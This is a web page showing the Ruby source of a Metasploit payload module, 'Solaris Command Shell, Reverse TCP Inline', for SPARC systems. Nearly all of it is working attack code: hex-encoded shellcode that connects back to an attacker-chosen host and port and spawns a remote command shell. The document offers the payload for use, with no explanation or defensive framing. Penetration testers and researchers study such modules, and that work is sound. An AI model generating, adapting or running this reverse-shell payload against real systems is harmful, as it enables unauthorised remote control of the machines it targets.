Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6

7
module MetasploitModule
8

9
  CachedSize = 144
10

11
  include Msf::Payload::Single
12
  include Msf::Payload::Solaris
13
  include Msf::Sessions::CommandShellOptions
14

15
  def initialize(info = {})
16
    super(merge_info(info,
17
      'Name'          => 'Solaris Command Shell, Reverse TCP Inline',
18
      'Description'   => 'Connect back to attacker and spawn a command shell',
19
      'Author'        => 'vlad902',
20
      'License'       => MSF_LICENSE,
21
      'Platform'      => 'solaris',
22
      'Arch'          => ARCH_SPARC,
23
      'Handler'       => Msf::Handler::ReverseTcp,
24
      'Session'       => Msf::Sessions::CommandShell
25
    ))
26
  end
27

28
  def generate(_opts = {})
29
    port    = (datastore['LPORT'] || '0').to_i
30
    host    = nil
31
    begin
32
      host = Rex::Socket.resolv_nbo_i(datastore['LHOST'] || '127.0.0.1')
33
    rescue SocketError
34
      host = Rex::Socket.resolv_nbo_i('127.0.0.1')
35
    end
36

37
    payload =
38
      "\x9c\x2b\xa0\x07\x98\x10\x20\x01\x96\x1a\xc0\x0b\x94\x1a\xc0\x0b" +
39
      "\x92\x10\x20\x02\x90\x10\x20\x02\x82\x10\x20\xe6\x91\xd0\x20\x08" +
40
      "\xd0\x23\xbf\xf8\x94\x10\x20\x03\x92\x10\x20\x09\x94\xa2\xa0\x01" +
41
      "\x82\x10\x20\x3e\x91\xd0\x20\x08\x12\xbf\xff\xfc\xd0\x03\xbf\xf8" +
42
      Rex::Arch::Sparc.set(0x20000 | port, "l0") +
43
      Rex::Arch::Sparc.set(host, "l1") +
44
      "\xe0\x3b\xbf\xf0\x92\x23\xa0\x10\x94\x10\x20\x10\x82\x10\x20\xeb" +
45
      "\x91\xd0\x20\x08\x94\x1a\xc0\x0b\x21\x0b\xd8\x9a\xa0\x14\x21\x6e" +
46
      "\x23\x0b\xdc\xda\x90\x23\xa0\x10\x92\x23\xa0\x08\xe0\x3b\xbf\xf0" +
47
      "\xd0\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\x91\xd0\x20\x08"
48
  end
49
end
50

51